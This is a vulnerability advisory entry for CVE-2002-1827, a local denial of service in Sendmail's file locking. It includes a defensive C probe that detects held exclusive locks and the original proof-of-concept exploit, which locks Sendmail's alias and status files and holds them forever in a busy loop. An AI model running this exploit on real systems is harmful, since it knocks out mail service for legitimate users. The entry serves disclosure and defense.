Sendmail File Locking Mechanism Denial-of-Service Vulnerability

Vulnerability ID: 1106745
Vulnerability type: Other
Published: 2002-05-24
Updated: 2005-10-20
CVE ID: CVE-2002-1827
CNNVD-ID: CNNVD-200212-826
Platform: Linux
CVSS score: 2.1
|Vulnerability source
https://www.exploit-db.com/exploits/21477
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-826
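|Vulnerability details
Sendmail is a popular free, open-source mail transfer agent that runs on many Unix and Linux operating systems. Sendmail's handling of file locking contains a flaw that lets a local attacker cause a denial of service. The flock() function can lock a file that has been opened for reading. The fcntl() function is used to lock a file that has been opened for writing, which provides better protection. Once a process has locked a file, other processes cannot operate on that file. Normally a program takes a lock with one of these two functions while it works on a file and releases it when finished. If an attacker builds a malicious program that locks sendmail-related files and never releases the locks, sendmail and related programs stop operating normally.
|Exploit (EXP)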
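A monitoring check for the condition described above, as an added example that is not part of the original advisory or exploit: exclusive_lock_held() probes a file with a non-blocking shared flock(), so the caller learns that an exclusive lock is held instead of hanging on it. The function names and the scratch path under /tmp are assumptions, and the demo only touches its own temporary file.

```c
#define _DEFAULT_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/file.h>
#include <sys/wait.h>
#include <unistd.h>

/* 1 = another process holds an exclusive flock() on path, 0 = no such lock,
   -1 = error. LOCK_NB makes the probe fail fast instead of blocking. */
int exclusive_lock_held(const char *path) {
    int fd = open(path, O_RDONLY), held = 0;
    if (fd < 0) return -1;
    if (flock(fd, LOCK_SH | LOCK_NB) == 0) flock(fd, LOCK_UN);
    else held = (errno == EWOULDBLOCK) ? 1 : -1;
    close(fd);
    return held;
}

/* Constructed scenario on a scratch file (path is an assumption): a child
   holds LOCK_EX through a read-only descriptor while the parent probes. */
int demo(int *during, int *after) {
    char path[] = "/tmp/lockprobe-XXXXXX", ok = 0;
    int ready[2], tmp = mkstemp(path);
    if (tmp < 0 || pipe(ready) < 0) return -1;
    close(tmp);
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {                      /* holder: read access is enough */
        int fd = open(path, O_RDONLY);
        ok = (fd >= 0 && flock(fd, LOCK_EX) == 0);
        if (write(ready[1], &ok, 1) != 1) _exit(1);
        pause();                         /* keep the lock until signalled */
        _exit(0);
    }
    close(ready[1]);
    int synced = (read(ready[0], &ok, 1) == 1 && ok);
    *during = synced ? exclusive_lock_held(path) : -1;
    kill(pid, SIGTERM);                  /* holder exits, kernel drops the lock */
    waitpid(pid, NULL, 0);
    *after = exclusive_lock_held(path);
    close(ready[0]);
    unlink(path);
    return synced ? 0 : -1;
}

int main(void) {
    int during, after;
    if (demo(&during, &after) != 0) return 1;
    printf("held while child runs: %d, after it exits: %d\n", during, after);
    return 0;
}
```

The probe reports a lock only while the holder is alive; flock() locks vanish when the holding descriptor is closed, so a positive result points at a live process.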
source: http://www.securityfocus.com/bid/4822/info
 
Sendmail is a MTA for Unix and Linux variants.
 
There is a vulnerability in Sendmail that will lead to a denial of service condition. The vulnerability occurs when a malicious user acquires an exclusive lock on files that Sendmail requires for operation. 

#include <fcntl.h>
#include <sys/file.h>   /* declares flock() */
#include <unistd.h>

/*

Stupid piece of code to test the sendmail lock vulnerability on
FreeBSD. Run this and try sendmail -t on FreeBSD for example.

More info: http://www.sendmail.org/LockingAdvisory.txt

zillion (at safemode.org && snosoft.com)
http://www.safemode.org
http://www.snosoft.com

*/

int main() {

  if(fork() == 0) {

    char *lock1 = "/etc/mail/aliases";
    char *lock2 = "/etc/mail/aliases.db";
    char *lock3 = "/var/log/sendmail.st";

    int fd;
    /* 0x02 is LOCK_EX: an exclusive lock, taken here on a read-only descriptor */
    fd = open(lock1,O_RDONLY);
    flock(fd,0x02);

    fd = open(lock2,O_RDONLY);
    flock(fd,0x02);

    fd = open(lock3,O_RDONLY);
    flock(fd,0x02);

    /* We are here to stay! */

    for(;;) {}

  }
}
|References

Source: www.sendmail.org
Link: http://www.sendmail.org/LockingAdvisory.txt
Source: BID
Name: 4822
Link: http://www.securityfocus.com/bid/4822
Source: XF
Name: sendmail-file-locking-dos(9162)
Link: http://www.iss.net/security_center/static/9162.php
Source: NSFOCUS
Name: 2854
Link: http://www.nsfocus.net/vulndb/2854